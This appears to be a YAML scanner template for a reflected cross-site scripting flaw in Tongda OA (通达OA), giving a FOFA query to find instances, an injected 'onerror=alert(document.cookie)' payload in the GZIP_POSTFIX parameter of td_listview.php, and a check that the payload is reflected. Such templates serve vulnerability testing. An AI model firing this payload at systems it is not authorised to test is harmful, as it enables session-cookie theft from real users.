product: 通达OA
vName: 通达OA 反射型XSS
type: 跨站脚本
vID: [ ]
level: 2
vDesc: ''
version: ''
note: ''
search:
  FOFA: app="TDXK-通达OA"
protocol: http
link: ''
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /module/html_editor/editor/plugins/td_listview/td_listview.php?GZIP_POSTFIX="+onerror=alert(document.cookie)+a=1
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - onerror=alert(document.cookie) a=1
            logic: and